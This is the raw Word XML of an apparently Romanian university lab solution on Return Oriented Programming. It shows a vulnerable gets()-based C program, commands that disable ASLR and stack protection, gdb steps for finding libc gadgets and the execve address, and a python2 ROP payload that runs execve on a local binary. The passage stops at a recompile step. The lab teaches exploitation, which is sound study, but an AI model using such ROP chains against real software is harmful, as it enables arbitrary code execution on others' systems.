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48E0" w14:textId="11600638" w:rsidR="0023311B" w:rsidRPr="00407173" w:rsidRDefault="00C337E5" w:rsidP="00407173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Laborator </w:t>
      </w:r>
      <w:r w:rsidR="00C20F6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Rezolvare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C796B" w14:textId="59119C40" w:rsidR="00C20F69" w:rsidRDefault="00C20F69" w:rsidP="001479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43512" w14:textId="07600DD8" w:rsidR="001D21A8" w:rsidRDefault="001D21A8" w:rsidP="001479CC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D21A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ROP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D21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 Oriented Programming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tehnică nouă pentru </w:t>
      </w:r>
      <w:r w:rsidRPr="001D21A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a profita de vulnerabilitatea </w:t>
      </w:r>
      <w:r w:rsidR="00E842F9" w:rsidRPr="00E842F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buffer overflow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AFFCCAC" w14:textId="38A03BF8" w:rsidR="00C84119" w:rsidRDefault="00C84119" w:rsidP="001479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Comenzi: </w:t>
      </w:r>
      <w:r w:rsidRPr="00315F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echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  → dezactivează ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06993AEA" w14:textId="77777777" w:rsidR="001D21A8" w:rsidRPr="001D21A8" w:rsidRDefault="001D21A8" w:rsidP="001479C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24E951" w14:textId="1BBAF31D" w:rsidR="00D933BE" w:rsidRDefault="008C2266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 Vulnerabil:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71096A2C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0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113B1180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0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221B0430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17C711F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func()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C50E9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5988B949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C2266">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w: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buffer[128];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D39052A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ab/>
        <w:t>gets(buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F88041C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C2266">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//dup2(1,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601276B8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3F6154CC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3FEFBCA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</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2266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argc, </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2266">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</w:t>
      </w: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*argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380E3A84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14E7B465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C2266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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18004363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C2266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(n &lt; 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D25E562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ab/>
        <w:t>func();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DDD831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8C2266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06BB7F62" w14:textId="77777777" w:rsidR="008C2266" w:rsidRPr="008C2266" w:rsidRDefault="008C2266" w:rsidP="008C2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C2266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42B45D79" w14:textId="77777777" w:rsidR="00B92DD3" w:rsidRDefault="00B92DD3" w:rsidP="00C20F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D41CB" w14:textId="77777777" w:rsidR="00B92DD3" w:rsidRDefault="00B92DD3" w:rsidP="00C20F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0D0A35" w14:textId="1C72D189" w:rsidR="00C20F69" w:rsidRDefault="00CF7B6B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Deschidem 2 terminale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C560A37" w14:textId="7BFBFACF" w:rsidR="00CF7B6B" w:rsidRPr="005079F4" w:rsidRDefault="00CF7B6B" w:rsidP="00C20F69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079F4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[T1]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1E2B8" w14:textId="45B6304E" w:rsidR="005A20C2" w:rsidRDefault="005A20C2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A2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-g -O0 -fno-stack-protector -o rop rop.c -no-pie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Pr="005A20C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-no-pie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: compilatorul să nu producă </w:t>
      </w:r>
      <w:r w:rsidRPr="005A20C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>un executabil independent legat dinamic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0E05A0" w14:textId="7231FE75" w:rsidR="005A20C2" w:rsidRDefault="005A20C2" w:rsidP="00C20F69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067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./rop</w:t>
      </w:r>
      <w:r w:rsidR="00E067BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E067BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ </w:t>
      </w:r>
      <w:r w:rsidR="00E067BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">se va bloca în bucla acelui </w:t>
      </w:r>
      <w:r w:rsidR="00E067BF" w:rsidRPr="00E067BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBB622" w14:textId="77777777" w:rsidR="00B92DD3" w:rsidRDefault="00B92DD3" w:rsidP="00C20F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5BEA9" w14:textId="671D9383" w:rsidR="00CF7B6B" w:rsidRDefault="00CF7B6B" w:rsidP="00C20F69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5587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[T2]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B0F023" w14:textId="7343696F" w:rsidR="00A14C4D" w:rsidRPr="00A14C4D" w:rsidRDefault="00A14C4D" w:rsidP="00C20F69">
      <w:pPr>
        <w:jc w:val="both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14C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sudo apt-get install nasm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499A811D" w14:textId="4A89608E" w:rsidR="00E067BF" w:rsidRDefault="00155877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5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ps -e | grep rop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obținem PID proces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134A0852" w14:textId="77BD32ED" w:rsidR="00155877" w:rsidRPr="00155877" w:rsidRDefault="00155877" w:rsidP="00C20F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5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sudo gdb attach </w:t>
      </w:r>
      <w:r w:rsidRPr="0015587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PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3057ACCD" w14:textId="755429A7" w:rsidR="00155877" w:rsidRPr="00155877" w:rsidRDefault="00155877" w:rsidP="00C20F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5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set variable n=11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CEDEC2" w14:textId="19C7C976" w:rsidR="00155877" w:rsidRDefault="00155877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5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 func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breakpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20887EDF" w14:textId="2C105A58" w:rsidR="00155877" w:rsidRDefault="00155877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587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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764D8895" w14:textId="2AA138EC" w:rsidR="00B92DD3" w:rsidRDefault="00B92DD3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 w:rsidRPr="00B92D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117FFE" wp14:editId="469FADF5">
            <wp:extent cx="576072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0EC5" w14:textId="019F2C34" w:rsidR="005938BA" w:rsidRDefault="005938BA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 w:rsidRPr="00593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D3E9C8" wp14:editId="1A386C4B">
            <wp:extent cx="5760720" cy="281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67C9" w14:textId="11BC0728" w:rsidR="005938BA" w:rsidRDefault="005938BA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 w:rsidRPr="00593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6B3F8D" wp14:editId="2178C9FF">
            <wp:extent cx="5760720" cy="343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337" b="28151"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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23598" w14:textId="41F46FD8" w:rsidR="00E305B6" w:rsidRDefault="00E305B6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Primele adrese:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59737A86" w14:textId="376BEBB7" w:rsidR="00A9062B" w:rsidRDefault="00A9062B" w:rsidP="00A906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62B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00007f0f510b3b6a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E93C9" w14:textId="296336D5" w:rsidR="00A9062B" w:rsidRPr="00A9062B" w:rsidRDefault="00A9062B" w:rsidP="00A906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62B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00007f0f510b4595</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE019F" w14:textId="4E158D85" w:rsidR="00E305B6" w:rsidRDefault="00112352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 arhitectura de 64b, când chemăm o funcție, avem următorii regiștrii</w:t>
      </w:r>
      <w:r w:rsidR="008B52AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (pt parametrii pasați)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73B8EB" w14:textId="2BE30EB8" w:rsidR="008B52AB" w:rsidRDefault="008B52AB" w:rsidP="008B52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C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 xml:space="preserve">primul parametru </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B875CC" w14:textId="4AE2D091" w:rsidR="008B52AB" w:rsidRDefault="008B52AB" w:rsidP="008B52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C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al doilea parametru</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A683825" w14:textId="4DD9571A" w:rsidR="008B52AB" w:rsidRDefault="008B52AB" w:rsidP="008B52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C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rdx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al treilea parametru</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF4FCC" w14:textId="40E7DD4F" w:rsidR="008B52AB" w:rsidRPr="008B52AB" w:rsidRDefault="008B52AB" w:rsidP="008B52A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5C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stivă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restul parametrilor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC9C287" w14:textId="7637CFBF" w:rsidR="00D11B50" w:rsidRDefault="00D11B50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 w:rsidRPr="00D11B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3F481E" wp14:editId="27FB7EAF">
            <wp:extent cx="5760720" cy="1069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7168" w14:textId="77777777" w:rsidR="000B37B7" w:rsidRDefault="000B37B7" w:rsidP="00C20F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BD8BF" w14:textId="77777777" w:rsidR="000B37B7" w:rsidRDefault="000B37B7" w:rsidP="00C20F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9B9DD" w14:textId="442C65D8" w:rsidR="00D11B50" w:rsidRDefault="00D11B50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Comenzi: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11B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next (suntem opriți la începutul funcției func și buffer nu a fost adăugat încă pe stivă)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12793844" w14:textId="574A221C" w:rsidR="00D11B50" w:rsidRDefault="00D11B50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D11B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x/30x $rsp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arată 40 de adrese de pe stivă (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA312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rsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> fiind registrul unde valoarea curentă a stivei e oprită)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74135C41" w14:textId="2A063CB4" w:rsidR="00D11B50" w:rsidRDefault="00D11B50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 w:rsidRPr="00D11B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5383BB" wp14:editId="21F54A72">
            <wp:extent cx="5760720" cy="3676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5DC6" w14:textId="649C34E7" w:rsidR="00E154D7" w:rsidRDefault="00E154D7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 w:rsidRPr="00E154D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RBP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154D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00007fffcabfa7e0</w:t>
      </w:r>
      <w:r w:rsidR="000B6482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (vrem să lăsăm această adresă neatinsă)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A66EDD" w14:textId="432257C9" w:rsidR="000B6482" w:rsidRDefault="000B6482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După RBP, avem </w:t>
      </w:r>
      <w:r w:rsidRPr="000B648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return address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">de la </w:t>
      </w:r>
      <w:r w:rsidRPr="000B64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 xml:space="preserve"> pe care vrem să o suprascriem cu una dintre gadget-urile noastre (adresa nu e importantă, doar locația).</w:t>
      </w:r>
      <w:r w:rsidR="004300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188C8" w14:textId="7644C0D6" w:rsidR="00112352" w:rsidRDefault="00E61AC6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Adrese:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476DDD2" w14:textId="602A22A3" w:rsidR="00DE645C" w:rsidRDefault="00DE645C" w:rsidP="00DE645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45C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pop rdi; ret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71542" w:rsidRPr="00D715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asmsearch "pop rdi; ret" libc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3E31CC" w:rsidRPr="003E31CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00007f0f510b3b6a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7FBEA6" w14:textId="39B07FA3" w:rsidR="003E31CC" w:rsidRPr="003E31CC" w:rsidRDefault="003E31CC" w:rsidP="003E31CC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E31C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1D66D5" wp14:editId="3CBF5943">
            <wp:extent cx="5760720" cy="996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2B72" w14:textId="0F00A8A2" w:rsidR="003E31CC" w:rsidRDefault="003E31CC" w:rsidP="003E31C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45C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pop r</w:t>
      </w:r>
      <w:r w:rsidR="00530E40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DE645C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>i; ret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715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asmsearch "pop r</w:t>
      </w:r>
      <w:r w:rsidR="00530E4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D715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i; ret" libc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814AF8" w:rsidRPr="00814AF8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00007f0f510b601f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27520FAB" w14:textId="5096A23A" w:rsidR="00871B68" w:rsidRPr="00871B68" w:rsidRDefault="00871B68" w:rsidP="00871B68">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00871B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DA6489" wp14:editId="46B63B13">
            <wp:extent cx="5760720" cy="986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2259" w14:textId="255F9B93" w:rsidR="0046247A" w:rsidRDefault="0046247A" w:rsidP="004624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45C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pop r</w:t>
      </w:r>
      <w:r w:rsidR="00FC2E55">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>dx</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE645C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>; ret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715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asmsearch "pop r</w:t>
      </w:r>
      <w:r w:rsidR="00FC2E5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dx</w:t>
      </w:r>
      <w:r w:rsidRPr="00D715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; ret" libc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="00FC2E55" w:rsidRPr="00FC2E55">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00007f0f511d2c92</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1356B847" w14:textId="02CE9CF5" w:rsidR="00FC2E55" w:rsidRPr="00632EEC" w:rsidRDefault="00632EEC" w:rsidP="00632EEC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00632E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6824CA" wp14:editId="56AEB1E6">
            <wp:extent cx="5760720" cy="1048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C839" w14:textId="60DAFC6C" w:rsidR="00632EEC" w:rsidRDefault="00632EEC" w:rsidP="00632EEC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32E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asmsearch "pop rdx; pop ?; ret" libc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→ </w:t>
      </w:r>
      <w:r w:rsidR="00B74F3D" w:rsidRPr="00B74F3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x00007f0f511a9211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE55A21" w14:textId="231DD667" w:rsidR="00B040D4" w:rsidRPr="00B040D4" w:rsidRDefault="00B040D4" w:rsidP="00B040D4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B040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6F62C" wp14:editId="15ACF974">
            <wp:extent cx="5760720" cy="854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05AA" w14:textId="7E8B7DB7" w:rsidR="00B201E7" w:rsidRDefault="00B201E7" w:rsidP="00B201E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buffer address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 &amp;buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00B201E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x7fffcabfa730</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862E258" w14:textId="31375EE8" w:rsidR="00B201E7" w:rsidRPr="00B201E7" w:rsidRDefault="00B201E7" w:rsidP="00B201E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01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40C7CB" wp14:editId="343D8499">
            <wp:extent cx="3839111" cy="50489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B66D" w14:textId="74E9C047" w:rsidR="00E94347" w:rsidRDefault="005D5056" w:rsidP="00E9434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execve</w:t>
      </w:r>
      <w:r w:rsidR="00E94347">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
      <w:r w:rsidR="00E94347">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E943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execve</w:t>
      </w:r>
      <w:r w:rsidR="00E94347">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="005D5056">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0x7f0f51173170</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7485E459" w14:textId="63970CA0" w:rsidR="00E94347" w:rsidRPr="002A5CF7" w:rsidRDefault="002A5CF7" w:rsidP="002A5CF7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5C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CC4DB6" wp14:editId="4C21D5D7">
            <wp:extent cx="5760720" cy="4432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55ED" w14:textId="12B74538" w:rsidR="00E61AC6" w:rsidRDefault="00E61AC6" w:rsidP="00C20F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D2C4D" w14:textId="77777777" w:rsidR="00D330CF" w:rsidRDefault="00D330CF" w:rsidP="00C20F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72C7E" w14:textId="388E9A2B" w:rsidR="00F21C37" w:rsidRDefault="00F21C37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Buffer</w:t>
      </w:r>
      <w:r w:rsidR="00BE228A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malițios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E228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"/bin/sh\x00"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE228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; address buffer; NULL; garbage characters; rbp; pop rdi; address buffer; pop rsi; buffer address + 8; pop rdx; NULL; NULL; execve address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6444EE42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python2 -c 'print(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43754653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"/bin/ls\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0517AAA8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"\x30\xa7\xbf\xca\xff\x7f\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FAB3F6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 xml:space="preserve">"\x00\x00\x00\x00\x00\x00\x00\x00"+104*"A"+      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6E8C3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"\xe0\xa7\xbf\xca\xff\x7f\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC7F8B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"\x6a\x3b\x0b\x51\x0f\x7f\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5D742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"\x30\xa7\xbf\xca\xff\x7f\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233FB7B3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"\x1f\x60\x0b\x51\x0f\x7f\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7714C2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"\x38\xa7\xbf\xca\xff\x7f\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1964424D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"\x92\x2c\x1d\x51\x0f\x7f\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650460F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"\x00\x00\x00\x00\x00\x00\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C8F3B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"\x00\x00\x00\x00\x00\x00\x00\x00"+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512FA5D8" w14:textId="77777777" w:rsidR="00D330CF" w:rsidRP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"\x70\x31\x17\x51\x0f\x7f\x00\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD73390" w14:textId="3A84E58A" w:rsid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  <w:r w:rsidRPr="00D330CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)' | ./rop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766B53A" w14:textId="77777777" w:rsidR="00D330CF" w:rsidRDefault="00D330CF" w:rsidP="00D330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3217E" w14:textId="61596727" w:rsidR="00F21C37" w:rsidRDefault="00DE5595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25138B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rop.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, comentăm loop-ul (</w:t>
      </w:r>
      <w:r w:rsidRPr="0025138B"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>) și recompilăm</w:t>
      </w:r>
      <w:r w:rsidR="00906B8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
